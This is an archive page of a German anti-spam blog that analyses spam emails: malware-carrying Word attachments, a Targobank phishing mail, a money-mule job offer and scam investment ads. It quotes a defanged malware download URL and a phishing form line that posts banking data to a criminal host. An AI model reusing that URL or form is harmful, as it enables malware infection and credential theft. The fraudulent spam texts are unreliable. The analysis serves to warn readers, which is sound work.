Schlagwortarchiv „Sehr geehrte Damen und Herren“

SFLEX Rechnung

Donnerstag, 28. Januar 2016

Zunächst das Wichtigste: Die Mail, die ich untersucht habe, wurde über eine dynamisch vergebene IP-Adresse aus Tunesien versendet und nicht etwa irgendwo in Freiburg. Sie kommt nicht von der S:FLEX GmbH. Sie wurde von Verbrechern versendet. Mit einem Botnetz aus Computern, die mit Schadsoftware übernommen wurden. Der Absender ist gefälscht. (Es ist übrigens kinderleicht, den Absender einer Mail zu fälschen.) Die Mitarbeiter des Unternehmens, dessen Firmierung und Reputation hier von Kriminellen in den Dreck gezogen wird, tun mir leid, denn sie werden sich heute mit vielen verärgerten Menschen herumschlagen müssen. (Die Website der Unternehmung ist übrigens zurzeit nicht erreichbar, und zwar vermutlich nur wegen der Besuche durch hunderttausende Spamempfänger.) Diese kriminelle Spam hat bereits jetzt einen ordentlichen Schaden angerichtet.

Sehr geehrte Damen und Herren,

vielen Dank für Ihren Auftrag.

Im Anhang erhalten Sie die Rechnung zu unserer aktuellen Lieferung.

Kurzes Spamkompetenztraining! Was bedeutet wohl diese Kombination von Merkmalen:

Die Mail geht angeblich von einem Unternehmen an einen Kunden, die Ansprache ist aber unpersönlich;
der Auftrag, um den es geht, ist nicht genauer beschrieben und völlig unklar;
es gibt dazu eine Rechnung, aber irgendwelche wichtigen Angaben zum Rechnungsbetrag, zur Bankverbindung, zum Zahlungsziel fehlen im Text der Mail, als ob es dort keinen Platz mehr gäbe; und
alles weitere kann nur dadurch geklärt werden, dass ein Mailanhang geöffnet wird?

Bingo! Es handelt sich um eine Spam, an der eine Schadsoftware hängt. Der Anhang wird das reinste Gift sein. Es handelt sich diesmal um ein Word-Dokument¹…

$ file xxxxxx.doc | sed 's/, /\n/g'
xxxxxx.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Title: functional
Author: Microsoft Office
Template: Normal.dot
Last Saved By: Microsoft Office
Revision Number: 2
Name of Creating Application: Microsoft Office Word
Total Editing Time: 01:00
Create Time/Date: Thu Jan 28 05:44:00 2016
Last Saved Time/Date: Thu Jan 28 05:44:00 2016
Number of Pages: 1
Number of Words: 1
Number of Characters: 10
Security: 0
$ _

…dessen Text aus einem einzigen Wort auf einer Seite besteht – diese vorgebliche „Rechnung“ enthält also nicht einmal die Aufforderung „Geld her“, die schon zweier Worte bedarf. Im Dokument ist ein Makro, das einen Installer für kriminelle Schadsoftware nachlädt und ausführt.

Es handelt sich um aktuelle Schadsoftware, die zurzeit von den meisten Antivirus-Programmen noch nicht erkannt wird. Deshalb ist es so wichtig, derartige Spam selbst zu erkennen und niemals auf die Idee zu kommen, einen Anhang einer Spam zu öffnen. Generell sollten Mailanhänge mit äußerster Vorsicht behandelt werden, denn dabei handelt es sich um einen der Hauptverbreitungswege für die höchst asoziale und kriminelle Schadsoftware-Pest der spammenden Verbrecher.

Und wie schon gesagt:

Mit freundlichen Grüßen

Michael Dietrich
Projektleiter Gestelltechnik

S:FLEX GmbH Freiburg
Sasbacher Str. 7
79111 Freiburg

Tel.: +49 (0) 761 888 5xxx 54
Fax: +49 (0) 761 888 5xxx 39
Mobil: +49 (0) 173 70 70 xxx
m (punkt) dietrich (at) sflex (punkt) com
www (punkt) sflex (punkt) com

Der Absender der Spam ist gefälscht und die Angaben unter der Mail – ich habe die Telefonnummern mal unkenntlich gemacht, weil dort momentan Menschen kurz vorm Nervenzusammenbruch an der Leitung hängen werden – haben ebenfalls nichts mit dem Absender zu tun. Es gibt keine Möglichkeit, den wirklichen Absender dieser kriminellen Belästigung zu erreichen, denn dieser bevorzugt aus naheliegenden Gründen die Anonymität. Strafanzeigen wegen versuchter Computersabotage nimmt die Polizei oder Staatsanwaltschaft entgegen, aber die Ermittlungsaussichten sind… ähm… nicht so toll. Aber irgendwann macht auch dieses Pack mal einen Fehler…

Nachtrag: Inzwischen ist die Website der S:FLEX GmbH wieder erreichbar. Ich lege den dort Verantwortlichen nahe, einen deutlichen Hinweis auf die Spam auf ihrer Startseite zu platzieren, um Empfänger zu warnen und die betrieblichen Kräfte auf gewinnbringendere Dinge als eine Flut von Rückfragen auszurichten. Im Moment (15:10 Uhr) ist das nicht der Fall. (Aber ich kann mir gut vorstellen, was dort gerade los ist! Das kleine Serverchen, auf dem Unser täglich Spam läuft, steht jedenfalls wegen dieser einen Spam ordentlich unter Last.)

¹Im originalen Dateinamen ist ein Name enthalten, deshalb die Unkenntlichmachung.

Reservierungsliste

Mittwoch, 27. Januar 2016

Das ist die heutige Pest im Posteingang!

Von: Velotours Touristik <reservierung (at) velotours (punkt) de>

Diese E-Mail (also das eine Exemplar aus der Flut, das ich mir gerade vorgeknöpft habe) wurde über eine dynamisch vergebene IP-Adresse aus Taiwan versendet, kommt also vermutlich von einem mit Schadsoftware zum Bot gemachten Privatrechner. Der Absender ist – wie immer in der Spam – gefälscht. Die armen Mitarbeiter von Velotours, die heute eine Menge Arbeit mit verärgerten Empfängern dieser Spam haben werden, tun mir leid. Einen asozialen, kriminellen Spammer interessiert das leider nicht, und die wirtschaftlichen Schäden bei anderen nimmt er billigend in Kauf, wenn nur das eigene „Geschäftchen“ läuft.

Sehr geehrte Damen und Herren,

anbei finden Sie unsere neue Reservierungsliste.

Ihr VELOTOURS-Team

Kleines Spamkompetenztraining. Was bedeutet die folgende Kombination von Merkmalen:

Unpersönliche Anrede von einer Unternehmung, die so tut, als sei man dort Kunde.
In der Mail steht nichts Substanzielles.
Alles weitere erfährt man nur durch Öffnen eines Mailanhanges.

Bingo! Es ist mit an Sicherheit grenzender Wahrscheinlichkeit eine Schadsoftware im Anhang.

In diesem Fall ist der Anhang ein Dokument für Microsoft Word. Dieses Dokument¹…

$ file ResLi_9_Lauf_3261_vom_27.01.2016.DOC | sed 's/, /\n/g'
ResLi_9_Lauf_3261_vom_27.01.2016.DOC: Composite Document File V2 Document
Little Endian
Os: Windows
Version 5.1
Code page: 1251
Author: Administrator
Template: Normal.dot
Last Saved By: User
Revision Number: 7
Name of Creating Application: Microsoft Office Word
Total Editing Time: 03:00
Create Time/Date: Wed Jan 27 11:07:00 2016
Last Saved Time/Date: Wed Jan 27 11:15:00 2016
Number of Pages: 1
Number of Words: 27
Number of Characters: 511
Security: 0
$ _

…enthält stolze 27 Wörter auf einer einzigen Seite. Es wurde im Verlaufe dreier Minuten zusammengetippt, und zwar von jemanden, der sich mit dem Namen „Administrator“ registriert hat. Das ist eine ausgesprochen kurze „Reservierungsliste“.

Und in der Tat, es kommt hier nicht auf den Text an. Der sieht übrigens so aus:

If this document has incorrect encoding - enable macro -- gefolgt von leckerem Zeichensalat...

Nun, das Makro soll automatisch ausgeführt werden. Bei aktuellen Versionen von Microsoft Office ist die automatische Ausführung standardmäßig deaktiviert. Wer auf die dumme Idee kommt, auf den Wunsch eines Unbekannten hin die Ausführung von Makros zu gestatten, um etwas anderes als die sondersame Lyrik eines auf den Tasten herumprügelnden Schimpansen lesen zu können; wer die Standardeinstellung verstellt hat oder wer eine ältere Version von Microsoft Word verwendet, bekommt eine kostenlos installierte Version von Schadsoftware, deren Installer von der URL http (doppelpunkt) (doppelslash) parass (punkt) si (slash) 54t4f4f (slash) 7u65j5hg (punkt) exe nachgeladen wird. Hinterher steht ein Computer anderer Leute auf dem Schreibtisch – und diese Leute wären besser mit Handschellen bedient.

Wer sich sicher fühlt, weil er ja ein Antivirus-Schlangenöl auf seinem Rechner hat, ist in diesem Fall leider in fast allen Fällen verlassen. Deshalb ist es auch so wichtig, dass man Spam selbst erkennt und sie löscht, statt darin herumzuklicken. Bei aktueller Schadsoftware versagt das Antivirusprogramm regelmäßig – und zwar sogar bei den Unternehmen, die Antivirus-Schlangenöl herstellen. Generell sollten niemals Mailanhänge geöffnet werden, deren Zustellung nicht vorher explizit (und über einen anderen Kanal als E-Mail) abgesprochen wurde – und generell gibt es keinen einzigen Grund dafür, Informationen nicht ganz normal in die Mail zu schreiben, statt sie in einem Anhang zu versenden.

¹Das Unix-Kommando file dient eigentlich dazu, den Dateitypen festzustellen, gibt aber bei vielen Dateitypen interessante Meta-Informationen aus. Die anschließende Pipe auf sed ist nur eine Verbesserung der Lesbarkeit, da sonst alles mit Komma getrennt in einer Zeile ausgegeben würde.

Rechnung Nr. 95355066 vom 15.01.2016

Mittwoch, 20. Januar 2016

Unser täglich Gift gib uns heute!

Sehr geehrte Damen und Herren,

Das ist doch genau mein Name!

in der Anlage erhalten Sie unsere Rechnung 95355066 vom 15.01.2016 im MS-Office Word Format. Diese Reifen sind per DPD an Sie unterwegs.

Aha, eine Rechnung. Im Text der Mail steht nichts näheres als ein Datum und eine laufende Nummer. Wer wissen will, um was zum hackenden Henker es hier geht, muss leider einen Anhang von einem Unbekannten öffnen. Zur angehängten Datei kann ich nur eines recht sicher sagen:

Screenshot des im Hexl-Mode von Emacs geöffneten Anhanges des E-Mail, der belegt, dass es sich um ein mehrteiliges MIME-Dokument handelt.

Sie hat zwar die Dateinamenserweiterung .doc, aber sie ist kein Word-Dokument. Es handelt sich um Schadsoftware. Wer diese Datei öffnet, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Und wer sich auf sein Antivirus-Schlangenöl verlässt, ist in neunzig Prozent der Fälle verlassen. Deshalb ist es so wichtig, derartige Spam selbst als Spam zu erkennen und niemals darin rumzuklicken sowie generell niemals einen Mailanhang zu öffnen, der nicht explizit vorher abgesprochen wurde – denn das Gehirn ist und bleibt das beste Hilfsmittel zum Erhalt der Computersicherheit.

Bitte drucken Sie diesen Beleg für Ihre weitere Verwendung und für Ihre Unterlagen aus.

Wer digitale Daten ausdruckt, um sie zu archivieren… ach!

Bitte beachten ! Dieser Beleg ist das Orginalexemplar !

Klar, die beliebig kopierbare Datei ist ein Original. Und wenn man die Datei kopiert, gibt es sogar zwei Originale. Und wenn man sie als Spam in die Welt sendet, auch mal hunderttausend.

Mit freundlichen Grüßen
Ignatius Peters

Freundlich wie die Pest
Dein krimineller Schadsoftwarespammer

Lieferschein

Dienstag, 22. Dezember 2015

Kurzes Spamkompetenztraining:

Sehr geehrte Damen und Herren,

in der Anlage erhalten Sie wie gewünscht den aktuellen Lieferschein.

Bei Fragen stehen wir Ihnen gerne zur Verfügung.

Mit freundlichen Grüßen

Textilreinigung Klaiber
Gewerbestrasse 39
78054 VS – Schwenningen
Telefon 07720 / 33xxx
Telefax 07720 / 33xxx
service (at) textilreinigung (strich) klaiber (punkt) de

Ich habe die Telefonnummern mal unkenntlich gemacht. Es handelt sich leider nicht um die Telefonnummern der Spammer, denen ich einiges Unfreundliche zu sagen hätte.

Eine Unternehmung, von der ich noch niemals etwas gehört habe, sendet mir eine Mail. Angeblich bin ich dort Kunde. Sie kennen aber nicht meinen Namen. In der Mail steht kein Wort darüber, um was es eigentlich geht, weil vermutlich kein Mailpapier mehr übrig war. Um das herauszubekommen, muss man einen Anhang öffnen.

Was wird wohl im Anhang sein?

Bingo! Es ist eine Schadsoftware.

In meinem Fall handelt es sich um eine 97,3 KiB große Datei für Microsoft Word. Diese… moment… *tackertacker*…

$ file 11815--113686.doc | sed 's/,/\n/g' | sed 's/^ *//'
11815--113686.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Author: Microsoft Office
Template: Normal.dot
Last Saved By: Microsoft Office
Revision Number: 2
Name of Creating Application: Microsoft Office Word
Create Time/Date: Tue Dec 22 08:13:00 2015
Last Saved Time/Date: Tue Dec 22 08:13:00 2015
Number of Pages: 1
Number of Words: 0
Number of Characters: 0
Security: 0
$ _

…hat eine Seite, auf der null Wörter stehen, kann also unmöglich der in der Spam versprochene Lieferschein sein. Die Bearbeitung ging ganz schnell, denn die Verbrecher haben nur kurz den Makrocode mit der Schadsoftware eingefügt, der beim Öffnen des Dokumentes ausgeführt werden soll.

Diese Schadsoftware wird zurzeit von den allermeisten Antivirus-Schlangenölen¹ nicht erkannt. Um so wichtiger, dass man derartige Versuche selbst erkennt. Praktisch jedes Mal, wenn in der Mail nichts Substanzielles steht und man nur über den Anhang erfahren kann, um was es eigentlich geht – natürlich gern mit alarmierender Formulierung im Betreff und in der Mail – handelt es sich um Schadsoftware im Anhang.

Es ist generell äußerste Vorsicht beim Umgang mit Mailanhängen geboten, und im Moment sind derartige Schadsoftware-Spams eine Pest.

¹Ich nenne Antivirus-Produkte zugegebenermaßen unsachlich „Schlangenöl“, weil sie wirkungslos und sogar gefährlich, also durchaus mit Quacksalberprodukten vergleichbar sind.

Targobank – Datenabgleich

Samstag, 4. Juli 2015

Aber ich bin da doch gar nicht Kunde. 😉

Absender: Targobank <direkt (at) targobank (punkt) de>

Dieser Absender ist gefälscht. (Jeder Absender in einer Spam ist gefälscht.) Diese E-Mail kommt nicht von der Targobank.

Screenshot der Darstellung der HTML-formatierten Spam in der Mailsoftware

Hui, Design!

Ich halte diese Phishing-Spam für gefährlich, weil sie überdurchschnittlich gut gemacht ist. Wer Kunde bei der Targobank ist und darauf reingefallen ist, sollte sich sofort mit der Bank in Verbindung setzen, um den Schaden zu minimieren.

Sehr geehrte Damen und Herren,

Genau mein Name!

Eine richtige Bank würde ihre Kunden natürlich mit Namen ansprechen, und weil gar nicht so wenige Kunden mehrere Konten haben, würde sie auch noch erwähnen, auf welches Konto sich die Mail bezieht.

Ein Spammer kann im Allgemeinen – wenn er nicht aus einem Hack oder anderen Quellen eine Zuordnung von Mailadressen zu Bankdaten hat – nicht wissen, welche Kontonummer seine Empfänger haben. Ein vorsichtiger Umgang mit Bankdaten und die Verwendung einer eigenen E-Mail-Adresse ausschließlich für die Kommunikation mit der Bank sind ein wichtiger und sehr wirksamer Schutz gegen Phishing.

unser System hat festgestellt das Ihr Telefon-Banking PIN aus Sicherheitsgründen geändert werden muss.

Da bin ich aber froh, dass „euer System“ nicht festgestellt hat, dass ich ohne Grund 20.000 Øre berappen muss!

Bitte nutzen das unten angefügte Formular um die Änderung Ihres Telefon-Banking PIN kostenfrei zu ändern.

Das „unten angefügte Formular“ ist eine an die Spam angehängte HTML-Datei, die im Browser so aussehen würde¹:

Das Wichtigste daran ist, wo die eingegebenen Daten hingehen. Diese Frage beantwortet sich leicht durch einen Blick in den Quelltext der HTML-Datei:

<form [...] method="POST" action="http://a.dbbanking.ru/de/targo/login/targo.php"  >

Die Daten gehen also nicht zum Server der Targobank, sondern zum Server unter der von Kriminellen kontrollierten, russischen Domain a (punkt) dbbanking (punkt) ru. Das ist auch der Grund, weshalb man der „Targobank“ so viele Dinge sagen soll, die die richtige Targobank längst kennt, wenn man dort Kunde ist, zum Beispiel die eigene Kontonummer. Allein die hier angegebenen Daten reichen für die Übernahme des Kontos durch die Kriminellen, und ich bin mir sicher, dass nach dem Absenden noch weitere Daten für eine angebliche „Sicherheitsprüfung“ abgefragt werden – sehr beliebt sind wegen ihrer „vielseitigen kriminellen Verwendbarkeit“ Kreditkartendaten.

(Hinweis: Andernfalls belasten wir Ihr Konto mit 18,99€ und fordern die Änderung schriftlich über den Postweg bei Ihnen an.)

Damit ein Mensch auch so wirklich doof wird, darauf reinzufallen, wird er mit technokratischen Entgelt-Forderungen gefügig gemacht – so frei nach dem Motto: „Wir haben ein Sicherheitsproblem, zahlen sie bitte grundlos zwanzig Euro. Die Gebührentabelle, nach der wir dieses Geld erheben, haben wir uns einfach aus dem Hintern gezogen“.

Es handelt sich übrigens um langsame Verbrecher:

Ihren Telefon-Banking PIN können sie hier, oder wie folgt ändern:

1. Öffnen Sie die Datei im Anhang Ihrer Email und wählen Sie „öffnen mit“ aus.
2. Füllen Sie alle vorgesehenden Felder aus und klicken dann auf „Daten absenden“..
3. Ihr Telefon-Banking PIN aktiviert sich nach 5-7 Werktagen.

Die brauchen fast eine Woche, bis sie alles aus dem Konto rausgeholt haben, was sie rausholen wollen.

Für weitere Fragen ist unser Online Support unter: direkt (strich) pin (at) targobank (punkt) de 24Std. für Sie erreichbar.

Was, die sind nur 24 Stunden erreichbar? Und wenn die Frage einen Tag später kommt, hat man eben Pech gehabt? Tja, so etwas kommt raus, wenn die Phisher in Sprachen schreiben, deren Subtilitäten sie nicht verstehen. Ein Autor, der Deutsch kann, hätte „rund um die Uhr“ geschrieben und nicht das irreführende Ergebnis aus einer Computerübersetzung verwendet.

Es ist wieder einmal wie so oft bei den Phishing-Spams: Wenn der eigentliche Phishing-Kram formuliert ist, werden die Spammer oft ein wenig nachlässig und ihnen passieren kleine und zuweilen auch große und sehr peinliche Fehler. Wer sich nicht in Panik versetzen lässt (Sicherheitsmaßnahme der Bank, das wird teuer, wenn ich nicht reagiere) und gründlich liest, wird beinahe jede Phishing-Spam an solchen Details erkennen.

Targobank AG & Co. KG
Kasernenstr. 10
40213 Düsseldorf

Ihre Targobank

Wer es jetzt immer noch nicht bemerkt hat: Die Targobank hat mit dieser Spam nichts zu tun. Es ist eine Mail von Verbrechern, die ihre kriminellen Geschäfte mit fremden Konten machen wollen und die das Geld anderer Leute bei Koks und Nutten verprassen wollen.

Beratungstermin kostenlos unter:
info (at) targobank (punkt) de

Copyright © 2013 TARGOBANK

Oh, eine Mail von 2013 diente den Spammern als Vorlage… 😉

¹Ich rate strikt davon ab, Anhänge aus Spams zu öffnen, wenn man nicht weiß, wie man ein gut gesichertes System herstellt. Ein Virenscanner und eine „personal firewall“ machen kein gut gesichertes System. Das bisschen befriedigte Neugierde ist den möglichen Ärger niemals wert.

Diese Spam ist ein Zustecksel meines Lesers M.S.

Nebenjob.

Dienstag, 7. April 2015

Mit Punkt am Ende des Betreffs. So wird mir das Filtern der Spam doch sehr erleichtert, denn das machen nur Spammer, die ihre Skripten nicht richtig verstehen (oder einfach keinen Stil haben).

Sehr geehrte Damen und Herren,
eine neue Vakanz ist eroffnet:
Stelle: Assistent der Finanzabteilung

Großes Kino! Völlig namenloser Empfänger einer Mail soll einen Job in der „Finanzabteilung“ einer völlig namenlosen Unternehmung bekommen. Statt einer Firmierung des Unternehmens kann man aber immerhin…

„Erfolg – unser Ansporn“ ist unser Motto!

…ein tolles „Motto“ lesen, das vermutlich einem minderbegabten Spamautor auf der Toilette eingefallen ist.

Ein breit gefachertes Spektrum an Klienten halt uns frisch und fordert uns stets mit neuen Aufgaben heraus. Langeweile ist fur uns ein Fremdwort. Die Strategie wird von unseren Mandanten mit grober Treue [sic!] belohnt.

Das ganze wird ergänzt um weitere grobe Phrasen, die nichts sagen.

Unsere Gesellschaft ist als unabhangiges Escrow-Unternehmen lizenziert, das die Transaktionen versichert. Wir machen unsere Arbeit fur Kunden Online. Wir bieten unseren Service in dem sehr hohen professionellen Niveau.

Eine tolle Unternehmung! Hat keinen Namen, keine Anschrift und sucht seine Leute für die „Finanzabteilung“ mit illegaler und asozialer Spam.

Was macht man da?

Ihre Aufgaben
– Zusammenarbeit Erstellung des Vertrags und deren Bearbeitung
– Unabhangige Ubernahme kleinerer Projekte
– Mitarbeit bei der Erstellung von Berichten und Statistiken
– Unterstutzung im Tagesgeschaft sowie bei anderen Projekten
– Gute Moglichkeit 3000 – 4000 Euro verdienen.

Mit seinem eigenen Namen, seiner eigenen Anschrift und seinem eigenen Konto die Geschäfte für Leute aus der organisierten Kriminalität (vor allem Geldwäsche und Betrug) durchführen und sich hinterher dafür verhaften und verknasten lassen
Geld vom Konto abheben und über Western Union zu irgendwelchen Anonymen irgendwo in der Welt senden
Pakete empfangen, neue Adressaufkleber draufkleben und weitersenden
Übers Internet mitteilen, was man getan hat, damit es auf der anderen Seite schnell klar wird, wenn man deswegen verhaftet wurde – so dass mit dem Verschleiß eines anderen leichtgläubigen Menschen begonnen werden kann
Eventuell gibt es noch weitere Hilfstätigkeiten für die Kriminellen
Nachdem man sich seine Vorstrafe abgeholt hat (und unter Umständen sogar einen längeren „Urlaub“ in der JVA), „darf“ man für alle dabei angerichteten Schäden (mehrere zehn- bis hunderttausend Euro) haften

Dazu kann doch keiner „nein“ sagen! Und weil es doch so viele Menschen gibt, deren Gehirn zu stark durchblutet wird, hier gleich noch einmal:

Auch Rentner sind fur diese Arbeitstatigkeit geeignet.

Wir nehmen jeden! Man muss auch nichts können! Sei so doof und…

Freuen Sie sich auf einzigartige Karrierechancen in einem dynamischen und innovativen Unternehmen. Wir bieten Ihnen einen abwechslungsreichen und eigenverantwortlichen Job in einem vollen Energie Gruppe [sic!].

…freu dich auf deine Chance in einem Unternehmen ohne Anschrift und Firmierung! Das wird der goldene Start in die kriminelle Karriere!

Und jetzt bitte…

Wenn Sie Interesse haben, dann freuen wir uns auf Ihre aussagekraftige Bewerbung uber unser Online Portal. Bitte nennen Sie uns Ihren fruhestmoglichen Eintrittstermin sowie Ihre Gehaltsvorstellung und laden Sie nur Dateien mit einem Datenvolumen von maximal 5 MB hoch.

…einmal den Datenstriptease vor Spammern machen, einschließlich der tief in die Privatsphäre reinragenden Dinge, die man in einer Bewerbung mitteilt! Falls sie nicht jeden „Bewerber“ verheizen können, haben die dann gleich noch ordentlich Datenmaterial für ihre Betrugsgeschäfte.

Und übrigens:

Antworten Sie bitte auf diesen E-Mail loveolga (punkt) yy (at) gmx (punkt) com oder lassen Sie Ihrer Telefonnummer und wir kontaktieren mit Ihnen in allerkurzester Zeit.

Das Senden einer Bewerbung an eine kostenlos und anonym eingerichtete Mailadresse beim Freemailer GMX ist das neue „Bewerben über unser Online-Portal“.

Ohne Gruß, aber voller Verachtung
Deine Betrügerbande auf der Suche nach Hilfsgeldwäschern

Re: Senkung von Ubersetzungsaufwendungen

Donnerstag, 19. März 2015

Sehr geehrte Damen und Herren!

Unter Bedingungen der Weltkrise proponieren wir eine wesentliche Kürzung Ihrer Ausgaben für Übersetzungen. [sic! Was für eine Art von Sprache dabei herauskommt, sieht man an unserer Spam.]

Das Übersetzungszentrum TRIS ist ein Team aus hochqualifizierten Übersetzern. [sic! Das Zentrum ist ein Team…]

Wir werden qualitativ hochstehende Übersetzungen zu einem für Sie günstigeren als auf europäischem Markt geltender Preis machen. [sic! Warum das so billig ist, sieht man so auch gleich]

Dem Preis-Qualität-Verhältnis nach ist unser Angebot eines der günstigsten sowohl in der Ukraine als auch im Ausland.

Der Preis eines Wortes beträgt EUR 0.04 [sic!]

Wir erfüllen die Übersetzungen von Texten [sic!] in alle Sprachen Europas und gewährleisten unseren Kunden volle Vertraulichkeit ihrer Information.

Mit aufrichtiger Hochachtung und Hoffnung auf weitere Zusammenarbeit

Kovaleva Irina e-mail: k (punkt) ira (at) tris (punkt) com (punkt) ua; manager (strich) vip (at) tris (punkt) com (punkt) ua

Als echt gute und billige und unsere mehr als nur ein wenig unbeholfen anmutenden Schraubformulierungen schön fett setzende Dolmetscher und Sprachexperten aus dem Expertenzentrum können wir fast alles, außer vielleicht mal so einen Umlaut in einen E-Mail-Betreff zu kriegen…

Newsletter – Neue Schlagzeilen + 2 Programme zur Kapitalbeschaffung ! ohne wenn und aber !

Montag, 9. März 2015

In die „Hall of Shame“ kommen nur die ganz Großen. Die, bei denen sich der mutige und an keinerlei tieferes Empfinden gekoppelte Einsatz von Sprache, die geschickte Auswahl von quellenlos gemachten Zitaten und das Streben nach gestalterischer Exzellenz beim Design einer HTML-formatierten Mail zu einem großartigen Produkt formiert. Die, bei denen die Worte erst einmal Luft holen müssen, ehe sie das Gesehene beschreiben können. Wenn du hier landen willst, Spammer, denn musst du dir schon eine ganz besonders hirnlose Form der Spam angewöhnen…

Sehr geehrte Damen und Herren

Genau mein Name!

Kapitalbeschaffung ohne Wenn und Aber – mit unserem Kapitalaufbauprogramm

Wie, du willst mir Geld schenken?

Jeden Tag neue Schlagzeilen.

Stimmt, in den Zeitungen stehen jeden Tag neue Schlagzeilen. Nur von irgendwelchem Geld, das mir mit einer asozialen und illegalen Spam in die Tasche gemacht wird, steht da nie etwas. Dabei wäre das so eine Meldung…

Mehr als zwölf Millionen Menschen sind in Deutschland arm. In Deutschland gelten mehr als zwölf Millionen Menschen als arm. So viele waren es seit der Widervereinigung noch nie. Vor allem Alleinerziehende und Rentner, aber auch viele Minderjährige seien von Armut betroffen, sagte Ulrich Schneider, der Hauptgeschäftsführer des Paritätischen Wohlfahrtsverbands, dessen Armutsbericht den Titel „Die zerklüftete Republik“ trägt.

…moment: Ach so meinst du das! Und denen willst du jetzt Geld geben? Das finde ich ja sehr lobenswert.

Mehr als zwei Drittel der Bundesbürger (69 Prozent) glauben nach einer Umfrage nicht, dass ihre staatliche Rente im Alter zum Leben reichen wird.

Tja, so viele Menschen können sich ausrechnen, dass das Lohndumping von heute die Altersarmut von morgen wird. Angesichts der Einfachheit dieser Einsicht bin ich jetzt aber nicht überrascht, dass das ein paar Leute bemerken.

Unter den 30- bis 39-Jährigen sind es sogar 93 Prozent, bei den über 65-Jährigen 49 Prozent, wie die Befragung des Meinungsforschungsinstituts Emnid im Auftrag der „Bild am Sonntag“ ergab.

Wow, hast du eine tolle Quelle gefunden! Die Bildzeitung! Die ist so bekannt für ihre den Tatsachen verpflichteten Geschichten für Dumme, Grobe und Angstsüchtige, dass ich überall in Deutschland eine Bildzeitung kriege, wenn ich „Ein Lügenblatt, bitte“ sage. Und das selbst in Städten mit nennenswerter Konkurrenz im intelligenzverachtenden Gossenjournalismus, etwa in Hamburg mit seiner Mopo oder in München mit seiner tz. Was in dieses intellektuelle Müllblatt gestempelt wird, ist immer fragwürdig. Und da hast du jetzt echt nichts besseres gefunden? Mann, du bist aber ein ganz Großer! Und du kannst das so toll mit dem Schreiben! Hättest du diesen Absatz weggelassen, wäre deine Spam ein bisschen besser geworden.

Bundeskanzlerin Angela Merkel sorgt sich um die gesetzliche Rentenversicherung. Diese werde in Zukunft vielen nicht reichen, sagte sie auf einem Festakt zum 125-jährigen Bestehen des deutschen Rentensystems. „Wir sind gefordert, Altersarmut vorzubeugen und dafür geeignete Lösungen zu entwickeln“, so Merkel.

Frau Merkel – wie übrigens jede andere Gestalt in der Berliner Sprechpuppenkiste – gibt vor allem Unverbindlichkeiten von sich. Ihr jeweiliger Redenschreiber, der sich der Aufgabe entledigt, zwanzig Minuten Text für einen „Festakt“ in die Tasten zu hauen, ist in bedeutsam klingenden und bedeutungslos seienden Formulierungen echt gut.

Übrigens hat Frau Merkel nicht das Folgende gesagt: „Wenn ihr Angst vor Altersarmut habt, wartet einfach auf das Angebot eines Spammers, der euch Geld verspricht!“

Kapitalbeschaffung ohne Wenn und Aber – mit unserem Kapitalaufbauprogramm

Aber es ist zu spaet um der Altersarmut vorzubeugen. Die Armut ist schon da, und das in allen Altersgruppen. Und die Altersversorgung?

Ach ja, ein Texter, der das mit dem Texten kann, ist schon toll.

Kapitalbeschaffung ohne Wenn und Aber – mit unserem Kapitalaufbauprogramm

Dem passieren vermutlich auch nicht solche kleinen Pannen mit der Zwischenablage, und er liest seinen Text vor der Verwendung nochmal durch.

Na gut, lassen wir das. Aber du Idiot von Spammer, du hast die Merkel und ihren Redenschreiber ins Spiel gebracht!

Spaetestens jetzt sollten Sie unsere kostenlose Informationen mit genauen Zahlen und dem chronologischen Ablauf sowie die Antraege anfordern. Dort Sie koennen selbst sehen wie diese Programme fuer Sie arbeiteten und vergleichen. Gerne nennen wir Ihnen Kunden die bereits Ihre Auszahlungen bekommen haben und bereit sind mit Ihnen zu sprechen. Fordern Sie einfach die Kontaktdaten an.

Wie, ich kann bei euch Geld beantragen?! Und das kann jeder, es entstehen plötzlich einfach so für jeden Menschen Banknoten aus der Luft? So wie es auch immer von diesen Pyramidenspielen behauptet wird?

Kapitalbeschaffung ohne Wenn und Aber – mit unserem Kapitalaufbauprogramm

Ach ja, die Zwischenablage…

Sie haben die Wahl zwischen:

Tripper und Syphillis? Nein, zwischen…

Programm 1: Erste Auszahlung von 350.000 Euro in max. 4 Monaten [sic!] und 2. Auszahlung von 600.000 Euro nach 15 Jahren.

Programm 2: Erste Auszahlung von 240.000 Euro in max. 4 Monaten [sic!] und 2. Auszahlung von 700.000 Euro nach nur 8 Jahren.

…einen sehenswerten Haufen Zaster und einem sehenswerten Haufen Zaster. Für jeden. Noch bevor der Sommer da ist. Vom Himmel geregnet. Im Startrek-Replikator erzeugt. Vom Weihnachtsmann.

Und zwar von einem Weihnachtsmann, der trotz dieser riesigen Geldmengen nicht das Geld übrig hat, auch nur Anzeigen in Zeitungen zu kaufen und deshalb auf das illegale und asoziale „Werbemittel“ der Spam setzt. Damit es auch richtig glaubwürdig ist! (Schon als Zeitungsanzeige würde es nach Betrug stinken.)

Kapitalbeschaffung ohne Wenn und Aber – mit unserem Kapitalaufbauprogramm

Oh, diese chinesische Wasserfolter!

Bei beiden Programmen haben Sie keine monatliche Belastung und Sie muessen keine Raten oder Versicherungspraemien zahlen.

Und das Besteste daran: Man bekommt das Geld einfach so, für nichts. (Außer vielleicht für die Einsendung von etwas Geld nach einem tollklingenden Verfahren, das dann dazu führt, dass alle hinterher mehr als vorher haben, weil… ähm… ja, weil dabei Luft zu Geld wird. Aber ohne den Zaubertrick mit dem Geldwegschicken geht das nicht. Wer würde solche tollen Dinge nicht sofort glauben?! Ich verkaufe übrigens Stroh aus der heiligen Krippe, für jetzt nur noch sechshundert Euro für zehn Gramm…)

Kapitalbeschaffung ohne Wenn und Aber – mit unserem Kapitalaufbauprogramm

Mann, Spammer, du schreibst, als hättest du dir dein Kapital beschafft, indem du größere Teile deiner Großhirnrinde verkauft hättest und den jetzt in deinem Schädel bestehenden Freiraum durch einen Chip aus einer Sprechpuppe befüllen würdest.

– Wir machen auch fuer Sie, aus 2015, ein erfolgreiches Jahr –

Na, immerhin gibst du mir etwas zu bloggen. Ich habe lange nicht mehr so viel gequirlte Scheiße in einer Spam gelesen.

Mit freundl. Gruss

Schön, dass du die Freundlichkeit lieber abkürzt… 😀

Josef Robert

Trading & Finances International S.A.

Av. Venezuela 729

1027 Santo Domingo

Dominican Republic

